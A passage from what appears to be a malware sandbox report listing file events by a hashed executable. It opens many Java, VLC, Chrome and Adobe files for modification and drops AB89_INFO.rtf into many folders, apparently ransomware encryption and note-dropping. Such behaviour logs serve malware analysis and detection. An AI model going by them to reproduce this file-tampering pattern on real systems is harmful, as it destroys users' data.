Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.sat4j.core_2.3.5.v201308161310.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\javafx-mx.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.publisher.eclipse.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chihuahua 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ko_KR.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.alert.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\META-INF\eclipse.inf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javap.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mexico_City 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\v8_context_snapshot.bin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-options.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Port_Moresby 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\currency.data 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Irkutsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome.dll.sig 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\DisabledGoogleUpdate.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.repository_2.3.0.v20131211-1531.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_LinkNoDrop32x32.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santarem 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.analysis_3.5.0.v20120725-1805.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+10 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\boot.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.filetransfer_5.0.0.v20140827-1444.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Mahe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-options_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-heapwalker_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+7 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-modules-appui_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\hprof-16.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\St_Johns 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-progress-ui_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Budapest 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Gibraltar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kathmandu 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-templates_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-masterfs.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Creston 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santo_Domingo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\Templates\To_Do_List.jtp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-settings_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Jujuy 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Broken_Hill 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Makassar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt.theme.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Tirane 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Marengo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Choibalsan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt_3.103.1.v20140903-1938.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.httpclient4_1.0.800.v20140827-1444.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Danmarkshavn 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\win32\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\youtube.crx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.ini 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbytools.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Los_Angeles 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-lib-profiler.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.RSD 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-progress-ui.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\alt-rt.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.frameworkadmin.equinox.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Boise 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Luxembourg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\jhall-2.0_05.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\chrome_pwa_launcher.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-tabcontrol_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Miquelon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Pontianak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Resolute 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Oslo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\Workflow.Targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\bbc_co_uk.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\THIRDPARTYLICENSEREADME-JAVAFX.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Rothera 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Colombo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Guyana 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Santa_Isabel 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+4 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Magadan 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_BR\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ru.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-api-caching.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\stop_collection_data.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\GetSelect.mp3 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Adelaide 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.fca 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\bin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-application-views_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Montevideo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Tegucigalpa 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-cli_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\rjmx.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.services.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jconsole.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.model.workbench.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-spi-actions.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.diagnostic.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state_1.0.1.v20140709-1414.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\EET 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\java.security 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Ndjamena 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\02_frenchtv.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Eula.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Mozilla Firefox\uninstall\helper.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Melbourne 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.ds_1.4.200.v20131126-2331.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-options-keymap_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-utilities_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.SF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_ef8c08_256x240.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\winXPBluTSFrame.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\dialogs\batch_window.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Tirane 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Menominee 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Dublin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Barbados 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_ja_JP.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jsse.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Ushuaia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for 